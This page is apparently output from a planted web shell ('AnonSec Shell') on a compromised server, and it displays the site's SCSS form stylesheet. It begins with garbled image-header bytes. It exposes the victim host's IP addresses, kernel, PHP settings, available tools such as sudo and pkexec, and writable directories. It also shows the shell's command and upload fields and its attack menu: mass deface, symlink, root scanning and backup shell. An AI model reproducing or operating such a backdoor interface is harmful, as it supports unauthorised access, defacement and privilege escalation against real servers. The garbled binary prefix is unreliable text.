JFIF  H H C nxxd C "     &    !1A2Q"aqBb    1   ? R{~ ,.Y| @sl_޸s[+6ϵG};?2Y`&9LP ?3rj  "@V]:3T -G*P ( *(@AEY]qqqALn +Wtu?)l QU T* Aj- x:˸T u53Vh @PS@ ,i,!"\hPw+E@ ηnu ڶh% (Lvũbb- ?M֍݌٥IHln㏷L(6 9L^"6P  d&1H&8@TUT CJ%eʹFTj4i5=0g J &Wc+3kU@PS@HH33M * "Uc(\`F+b{RxWGk ^#Uj*v' V ,FYKɠMckZٸ]ePP  d\A2glo=WL(6 ^;k"ucoH"b ,PDVlvL_/:̗rN\m dcw T-O$w+FZ5T *Y~l: 99U)8ZAt@GLX*@bijqW;MᎹ،O[5*5*@=qusݝ *EPx՝.~ YИ 3M3@E)GTg%Anp P MUҀhԳW c֦iZ ffR 7qMcyAZT c0bZU k+oG<] APQ T A={PDti@c>>KÚ"q L.1P k6QY7t.k7o  <P &yַܼJZy Wz{UrS @ ~P)Y:A"]Y&ScVO%17 6l4 i4YR5 ruk* ؼdZͨZZ cLakb3N6æ\1`XTloTuT AA 7Uq@2ŬzoʼnБRͪ&8}: e}0ZNΖJ*Ս9˪ޘtao]7$ 9EjS} qt" ( .=Y:V#'H: δ4#6yjѥBB ;WD-ElFf67*\AmAD Q __'2$ TX 9nu'm@iPDT qS`%u%3[nY,  :g = tiX H]ij"+6Z* .~|05s6 ,ǡ ogm+ KtE-BF  ES@(UJ xM~8%g/= Vw[Vh 3lJT  rK -kˎY ٰ  ,ukͱٵf sXDP  ]p]&MS95O+j &f6m463@ t8ЕX=6}HR 5ٶ06 /@嚵*6  " hP@eVDiYQT `7tLf4c?m//B4 laj  L} :E  b#PHQb, yN`rkAb^ |} s4XB4 * ,@[{Ru+%le2} `,kI$U` >OMuh  P % ʵ/ L\5aɕVN1R6 3}ZLj-Dl@ *( K\^i@F@551 k㫖h  Q沬#h XV +;]6z OsFpiX $OQ ) ųl4 YtK'(W AnonSec Shell
AnonSec Shell
Server IP : 104.21.79.64  /  Your IP : 104.23.197.31   [ Reverse IP ]
Web Server : nginx/1.18.0
System : Linux ip-172-31-29-104 5.15.0-1075-aws #82~20.04.1-Ubuntu SMP Thu Dec 19 05:24:09 UTC 2024 x86_64
User : www-data ( 33)
PHP Version : 7.4.3-4ubuntu2.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Domains : 2 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/app/karina/prd/assets/scss/var/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/app/karina/prd/assets/scss/var/_form.scss
.select-style {
    border: 0;
    border: 1px solid #DEDEDE;
    border-radius: 5px;
    padding: 1px;
    width: calc(100% - 0px);
    overflow: hidden;
    font-size: 15px;
    padding: 0 5px;
    height: 38px;
    position: relative;
    background-image: url(../img/arrow_down.png);
    background-repeat: no-repeat;
    background-size: 10px;
    background-position: calc(100% - 15px);
    margin-top: 10px;
    background-color: #fff;
    select {
        width: 100%;
        padding: 10px 5px; 
        border: none;
        box-shadow: none;
        background: transparent;
        background-image: none;
        -webkit-appearance: none;
        outline: none;
        font-family: $font_reg;
        font-size: 13px;
    }
    &.select-style_black {
        background: url(../img/arrow_down_white.png) no-repeat center #2F2F2F;
        background-size: 10px;
        background-position: calc(100% - 15px);
        margin-top: 10px;
        border: 0;
        height: 30px;
        color: #fff;
        select {
            padding: 6px;
            color: #fff;
        }
    }
    &.select-style2 {
        width: 50%;
    }
}

.select-style2 {
    border: 1px solid #D7D7D7;
    height: 38px;
    border-radius: 5px;
    background-color: #fff;
    overflow: hidden;
    .select-style {
        border: 0;
        border-radius: 0;
        float: left;
    }
    .select-style60 {
        width: calc(60% - 10px);
    }
    .select-style40 {
        width: calc(40% - 11px);
        border-left: 1px solid #D7D7D7;
    }
}

.group-input {
    text-align: left;
    font-size: 15px;
    padding: 10px 0;
    
    strong {
        color: #718096; 
    }
    input {
        margin-top: 10px;
        border: 0px solid #D7D7D7;
        background-color: #F7FAFC;
        border-radius: 3px;
        height: 30px;
        padding: 10px;
        width: calc(100% - 20px);
        outline: none;
        font-size: 13px;
        font-family: $font_reg;
        &.img {
            background-size: 25px;
            background-position: calc(100% - 10px) 5px;
            //width: calc(100% - 45px);
            background-repeat: no-repeat;
            background-color: #fff;
        }
        &.user {
            background-image: url("../img/ico_user.png");
        }
        &.date {
            background-image: url("../img/icon_calendar.svg");
        }
        &.email {
            background-image: url("../img/ico_mail.png");
        }
        &.password {
            background-image: url("../img/ico_password.png");
        }
        &.company {
            background-image: url("../img/icon_corporate.png");
        }
        &.phone {
            background-image: url("../img/icon_phone.png");
        }
        &:focus {
            border-color: $blue;
        }
    }
    .btn {
        display: inline;
        height: auto;
        width: auto;
        border-radius: 100px;
    }
    .btn_more {
        @include gradient_pos(#2BC1F6,
        #138EE9,
        left,
        100%,
        0%);
        width: 100%;
        padding: 15px 0;
        font-family: $font_reg;
        font-size: 16px;
        border-radius: 100px;
        &:hover {
            background: #138EE9;
        }
    }
    .input-password {
        position: relative;
    }
    .show_pass {
        position: absolute;
        right: 5px;
        top: calc(50% - 10px);
        margin: 0;
        cursor: pointer;
        z-index: 2;
        img {
            height: 30px;
        }
        &:hover {
            opacity: 0.7;
        }
    }
    .pass_hide {
        display: none;
        opacity: 0.5;
    }
    &.group-password {
        .info-input {
            float: left;
            width: 100%;
            margin-top: 5px;
            font-size: 11px;
            position: relative;
            z-index: 2;
        }
        .strenght_pass,
        .strength_meter {
            float: right;
            width: 130px;
        }
        .info-input2 {
            width: 100%;
        }
    }
    textarea {
        border: 0px solid #D7D7D7;
        padding: 10px;
        width: calc(100% - 20px);
        border-radius: 5px;
        outline: none;
        font-size: 15px;
        margin-bottom: 15px;
        margin-top: 5px;
        font-family: $font_reg;
        background-color: #F7FAFC;
    }
    input[type=file] {
        border: 1px solid #D7D7D7;
    }
    .file {
        display: block;
        text-align: center;
        border: 1px solid #D7D7D7;
        padding: 7px;
        padding-bottom: 13px;
        margin-top: 15px;
        margin-bottom: 15px;
        img {
            height: 20px;
            position: relative;
            top: 5px;
        }
        input {
            position: absolute;
            opacity: 0;
            left: 0;
            top: 0;
        }
    }
    .radiobox {
        input {
            float: left;
            width: auto;
            margin-right: 5px;
            display: none;
            &:checked~div {
                border-color: #1477EA;
                background: #E2F0FF;
            }
        }
        div {
            border: 1px solid #D7D7D7;
            padding: 4px 8px;
            border-radius: 5px;
            margin-bottom: 5px;
            display: inline-block;
            float: left;
            margin-right: 7px;
            font-size: 14px;
            cursor: pointer;
            &:hover {
                border-color: #1477EA;
                background: #E2F0FF;
            }
        }
        &.radiobox2 {
            div {
                padding: 10px 50px;
                font-size: 20px;
                margin-right: 15px;
            }
        }
        &.radiobox_full {
            width: 100%;
            div {
                padding: 10px;
                text-align: left;
                width: calc(100% - 20px);
                display: inline-block;
            }
        }
        &.radiobox3 {
            input {
                &:checked~div {
                    border-color: #1477EA;
                    background: #1477EA;
                }
            }
        }
        &.radiobox_skill {
            text-align: center;
            >div {
                width: calc(20% - 26px);
                float: left;
                img {
                    width: 50%;
                    padding: 10px;
                }
            }
            input {
                float: left;
                width: auto;
                margin-right: 5px;
                display: none;
                &:checked~div {
                    border-color: #1477EA;
                    background-image: url(../img/icon_checklist.png);
                    background-repeat: no-repeat;
                    background-position: 95% 5%;
                    background-size: 20px;
                    background-color: #E2F0FF;
                }
            }
        }
    }
    .checkbox_type {
        div {
            border-radius: 5px;
            margin: 7px;
            display: inline-block;
            float: left;
            font-size: 12px;
            cursor: pointer;
            text-align: center;
            width: 70px;
            height: 70px;
            padding: 5px;
            background: #fff;
            @include shadow(10px,
            0.1);
            img {
                width: 70%;
            }
            &:hover {
                color: #1477EA;
            }
        }
        input {
            float: left;
            width: auto;
            margin-right: 10px;
            display: none;
            &:checked~div {
                background: url(../img/checkbox-marked.png) no-repeat #fff;
                background-size: 15px;
                background-position: 90% 10%;
                color: #1477EA;
            }
        }
    }
    .checkbox_type2 {
        margin-bottom: 10px;
        display: block;
        label {
            float: left;
            width: 20px;
            height: 20px;
        }
        div {
            float: left;
            width: 20px;
            height: 20px;
            margin-right: 10px;
            background: url(../img/checkbox-blank.png) no-repeat;
            background-size: 20px;
        }
        input {
            float: left;
            width: auto;
            margin-right: 10px;
            margin-top: 3px;
            display: none;
            &:checked~div {
                background: url(../img/checkbox-marked.png) no-repeat #fff;
                background-size: 20px;
                color: #1477EA;
            }
        }
        span {
            float: right;
            width: calc(100% - 40px);
        }
    }
    .input_file2 {
        border: 1px solid #D7D7D7;
        border-radius: 5px;
        padding: 7px 20px;
        font-size: 15px;
        display: inline-block;
        input {
            display: none;
        }
    }
    .with_remove {
        position: relative;
        .remove {
            position: absolute;
            height: 30px;
            line-height: 30px;
            right: 0;
            top: 0;
            z-index: 5;
            margin: 2px 10px;
            font-weight: bold;
            cursor: pointer;
            &:hover {
                opacity: 0.8;
            }
        }
    }
    .input-style {
        position: relative;
        .left {
            position: absolute;
            width: 40px;
            margin: 0;
            padding: 0;
            left: 10px;
            top: 7px;
        }
        .right {
            position: absolute;
            width: 40px;
            margin: 0;
            padding: 0;
            right: 10px;
            top: 7px;
            text-align: right;
        }
        input {
            padding-left: 50px;
            padding-right: 50px;
            width: calc(100% - 100px);
        }
        &.input-style-right {
            input {
                padding-left: 10px;
                width: calc(100% - 60px);
            }
        }
        &.input-style-left {
            input {
                padding-right: 10px;
                width: calc(100% - 60px);
            }
        }
    }
    &.group-input2 {
        border-bottom: 1px solid $abu1;
        height: 35px;
        margin-bottom: 10px;
        position: relative;
        label {
            float: left;
            width: 100px;
            font-style: italic;
            margin-top: 10px;
        }
        input {
            float: left;
            width: calc(100% - 100px);
            border: 0;
            background: none;
            padding: 0;
            font-size: 15px;
            font-weight: normal;
            height: 35px;
            text-align: left;
            margin-bottom: 0;
        }
    }
    .select_search {
        //margin-top: 10px;
        //height: 38px;
    }
    .selectize-control.select_search.single,
    .selectize-control.select_search3.single,
    .selectize-control.select_search2.single,
    .selectize-control.select_search4.single,
    .selectize-control.select_search5.single,
    .selectize-control.select_search6.single {
        margin-top: 10px;
        height: 40px;
        .selectize-input {
            //height: 40px;
            background: #fff;
            input {
                height: 24px;
            }
        }
    }
    span {
        font-size: 12px;
        color: #979797;
        &.is-invalid-feedback {
            color: red;
        }
    }
    &.check {
        min-height: auto;
        input {
            width: 20px;
            float: left;
            padding: 5px;
        }
        label {
            float: right;
            width: calc(100% - 35px);
            padding: 3px 0;
        }
        &:after {
            content: "";
            display: block;
            clear: both;
        }
    }
    .range {
        .range_bar {
            width: 60% !important;
            float: left;
        }
        .num_kurs {
            float: left;
            font-size: 15px;
            color: #000;
            padding: 10px 5px;
        }
        .range_val {
            float: left;
            width: 200px !important;
            border: 0 !important;
            background: none !important;
            font-size: 15px;
            color: #000;
            padding: 2px;
            display: none;
        }
        .val_rang {
            float: left;
            width: 200px !important;
            padding-top: 10px;
        }
    }
    .small_info {
        font-size: 11px;
        line-height: 140%;
        margin: 10px 0;
        color: $abu3;
    }

    &.col-3 {
        float: left;
        width: calc(33.3% - 15px);
        margin-right: 15px;
        input {
            width: calc(100% - 20px);
        }
        &.last {
            width: calc(33.3% - 0px);
            margin-right: 0;
        }
    }
    &.col-2 {
        float: left;
        width: calc(50% - 15px);
        margin-right: 15px;
        input {
            width: calc(100% - 20px);
        }
        &.last {
            width: calc(50% - 0px);
            margin-right: 0;
        }
    }
}

.group-input-drag {
    background: #F0F0F0;
    border: 1px dotted #AAAAAA;
    padding: 30px;
    text-align: center;
    min-height: 300px;
    position: relative;
    .drag_label {
        display: block;
        position: relative;
        width: 100%;
        height: 280px;
        text-align: center;
        font-weight: bold;
        margin-top: 20px;
        .info_drag {
            display: inline-block;
            width: 200px;
            img {
                width: 50%;
                margin: 20px 0;
                display: inline-block;
            }
            .btn {
                padding: 15px 0;
                margin-top: 20px;
                width: 100%;
                font-weight: bold;
            }
        }
    }
    input[type="file"] {
        position: absolute;
        width: 100%;
        height: 100%;
        top: 0;
        left: 0;
        opacity: 0;
    }
    .imageThumb {
        border: 2px solid;
        padding: 1px;
        cursor: pointer;
    }
    .pip {
        display: inline-block;
        position: relative;
        width: calc(33.3% - 30px);
        margin: 10px;
        .box_img {
            background: #fff;
        }
        .btn {
            width: 100%;
            padding: 10px 0;
            display: block;
            text-align: center;
        }
    }
    .remove {
        display: block;
        background: red;
        width: 20px;
        height: 20px;
        line-height: 20px;
        border-radius: 100px;
        color: white;
        text-align: center;
        cursor: pointer;
        position: absolute;
        top: -10px;
        right: -10px;
    }
    .remove:hover {
        background: white;
        color: black;
    }
}

.input_select_join {
    border: 1px solid #D7D7D7;
    border-radius: 5px;
    input {
        width: 60%;
        float: left;
        border: 0;
    }
    .select-style_join {
        width: 30%;
        border: 0;
        float: left;
        border-left: 1px solid #D7D7D7;
        border-radius: 0;
        float: right;
    }
    .radio_join {
        width: 30%;
        margin: 5px;
        border: 1px solid #D7D7D7;
        border-radius: 3px;
        float: right;
        overflow: hidden;
        .radiobox {
            div {
                float: left;
                text-align: center;
                font-size: 13px;
                margin-right: 0;
                border: 0;
                width: 50%;
                padding: 2px 0;
                margin: 0;
                border-radius: 0;
                sup {
                    font-size: 9px;
                }
            }
            &:last-child {
                div {
                    border-left: 1px solid #D7D7D7;
                    width: calc(50% - 1px);
                    float: right;
                }
            }
            input {
                &:checked~div {
                    background: #1477EA;
                }
            }
        }
    }
}
.frame_upload {
    background: #F3F3F3;
    border-radius: 10px;
    width: calc(50% - 35px);
    margin-right: 15px !important;
    margin-bottom: 15px !important;
    float: left;
    text-align: center;
    padding: 15px 10px !important;
    position: relative;
    font-size: 12px;
    .imagePreview {
        width: auto;
        height: 150px;
        img {
            max-width: 80%;
            max-height: 60%;
            position: absolute;
            left: 50%;
            top: 50%;
            transform: translate(-50%, -50%);
        }
        .hapus {
            display: none;
        }
    }
    input {
        display: none;
    }
    label {
        display: block;
        height: 150px;
        &:after {
            position: absolute;
            content: "Browse File";
            padding: 10px 20px;
            background-color: $orange;
            color: #fff;
            width: calc(50% - 40px);
            font-size: 12px;
            font-weight: bold;
            left: 25%;
            top:60%;
            border-radius: 100px;
            cursor: pointer;
        }
    }
    .is-invalid-feedback {
        position: absolute;
        width: 100%;
        text-align: center;
        left:0;
        bottom: 10px;
    }

    
    

}
/* .imagePreview {
    position: relative;
    margin: 10px;
    img {
        height: 100px;
        border: 1px solid #f4f4f4;
    }
    .hapus {
        height: 20px !important;
        width: 20px !important;
        position: absolute;
        top: -10px;
        cursor: pointer;
        display: none;
    }
} */

Anon7 - 2022
AnonSec Team